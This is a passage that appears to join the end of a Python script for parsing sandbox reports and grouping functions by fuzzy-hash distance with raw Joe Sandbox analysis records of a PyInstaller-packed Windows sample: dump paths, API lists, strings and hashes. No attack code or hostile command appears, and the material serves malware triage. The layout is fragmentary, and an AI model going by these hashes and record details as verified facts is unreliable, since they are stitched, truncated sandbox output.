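    """Split at each 'Memory Dump Source' heading and read the bullet fields of
    every complete record; records cut off at a page boundary are skipped."""
    records = []
    for chunk in re.split(r"^Memory Dump Source$", text, flags=re.M):
        fields, associated = {}, []
        for line in chunk.splitlines():
            m = FIELD_RE.match(line.strip())
            if m and m.group(1).strip() == "Associated":
                associated.append(m.group(2).strip())
            elif m:
                fields[m.group(1).strip()] = m.group(2).strip()
        src = SOURCE_RE.match(fields.get("Source File", ""))
        if not src or "Instruction Fuzzy Hash" not in fields:
            continue
        records.append(FunctionRecord(
            src.group(1), src.group(2), associated, fields.get("Opcode ID", ""),
            fields.get("Instruction ID", ""), fields.get("Opcode Fuzzy Hash", ""),
            fields["Instruction Fuzzy Hash"]))
    return records

def nibble_distance(h1, h2):
    """Count differing hex digits between two equal-length fuzzy hashes (heuristic)."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))

def group_by_instruction_hash(records, max_distance=30):
    """Single-linkage grouping: functions whose instruction fuzzy hashes differ
    in at most max_distance nibbles (of 70 here) share a group. Threshold is arbitrary."""
    parent = list(range(len(records)))
    def root(i):
        while parent[i] != i:
            i = parent[i]
        return i
    for i, j in combinations(range(len(records)), 2):
        if nibble_distance(records[i].instruction_fuzzy,
                           records[j].instruction_fuzzy) <= max_distance:
            parent[root(i)] = root(j)
    groups = {}
    for i, r in enumerate(records):
        groups.setdefault(root(i), []).append(r.instruction_id)
    return sorted(groups.values(), key=len, reverse=True)

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(len(recs), "functions from", len({r.source_file for r in recs}), "dump(s)")
    for group in group_by_instruction_hash(recs):
        print(len(group), "function(s):", ", ".join(h[:12] for h in group))
```

On the sample, the three functions whose hashes share the `?51....A18651..F724DB39` pattern land in one group and the C541A066... function stays alone, which matches what a reader sees by eye; whether that reflects real code similarity would need the disassembly, since the page gives no definition of the hash.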
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                              • Instruction ID: b60adb5d74d807f3caf27008998dd559eb7d9b1c182344e0e7e838622f362c1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6941E232B14A5586FF04DF2ADA142A9A3A5FB58FD0B899037EE0D97B58DE3DD0428701
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction ID: 2a2495e4786645ac5e29718509e95a3a0756e7f08b731c8a25c57ccc95e786fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0031E132B08B4241F664EF31A44022EABD5EB84B90F9442BAEA5D53BD9DF3CD0118711
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                              • Instruction ID: 4579df3b3fae10439ce10e28d7fc74f993380b723cf582ea4425769c28f28920
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF068727182958BEB98DF6DA40272977D0F7083C0F8090BAD58D83B08DA3CD0518F15
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                              • Instruction ID: 4b1c5fb5e76b1ba6bbafb2edfb77f55d11e8889e1d97bff7d2a4e8917e36ca1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46A0013190C90AD4F648EB00A890235A325FF54304BC000B3E04D510A89E7CA404D222
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction ID: fd79366d10eff1426a2f1099dc66648e36f79815a7641e88e24ed06158b605d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7002C130E09F0781FA55FB55A9547B4A3A6EF05758BD040B3E86E0626CEF7CB54AC232
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7EAD086B7,?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0822C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
• Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
• Instruction ID: 27cbb44b4b0018f4524e81f297e685114d20aa569ed7601946d0285ee283ed2a
• Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
• Instruction Fuzzy Hash: B2518311A2964245FA50FB24D8913BEE391EF94788FC44473DA4E826DDEEBCE404C772
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: a8012bd7a016f766f73a3bb871c3bde1a5f8a6b3d9f8da6d8397509c6ea95a9f
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: F651E536604BA186E734DF26E4582BAB7A1F798B65F004132EBDE43698DF7CD045DB20
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction ID: 08d2f0078a2418339bae3794c8e6a015887efc3b0f7d055a356ea95435a0c623
• Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction Fuzzy Hash: 7C219431B08A4281F741EB7AA884379A365EF98B94F984272DA2D4339CDE7CD5518333
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: de9c408c801e32101772736e53160e0a1d31566744e1e5ec98a3828aaa881f07
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 46126562E0C24386FB24FA24D1547B9B7A2FB60750FC441F7D699866CEDB3CE5408B22
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 2653f5c1d6cf5271562f7af52eaaaad06ad4b670c26ad9377011de4cd82377d0
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: BC127361E0C54386FB24EA24A054379F7A5FB60754FC4417BF69A46ACCDB7CED808B22
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
• Instruction ID: c179b02e8ab817fdc8e10f860ac16882aa3e4fbaf717dbd76427642e37a46e0b
• Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
• Instruction Fuzzy Hash: FB418E61A0865282FA04FB51A8407B9E396FF54B88FC444B3ED4C4778ADE3CE545C362
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
• Instruction ID: 5b5ed3e474994c15a654b0ec843c4b7f621b2fcb613c033fff18a9adf1a11a26
• Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
• Instruction Fuzzy Hash: 9D417C61A0864286FB10FB21A4817B9E3A1EF44788FC445B3EE4D4BB9DDE7CE541C762
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction ID: 05464cc64c94789c6e6be47188418392d33ad4dfff48b3357dbd55191c3470ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D19132A087418AFB20EB25D4843ADB7A5FB54B8CF900176DE8D5779ACF38E080C752
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction ID: 9ecc6b87ec965c91b67ea067c1b481f8fca2832ff5f007ae2c7cd0bea07cbbb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931B332B08A4142F721EB25A8543AAA796FB88B98F810136EF4D9375DDE3CD546C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD4D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD5B
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD85
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDF3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction ID: 2c713b49549d6f197d2fde16d52d0d293cb4c8df6ec7ff3b1af5dffb154b89d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
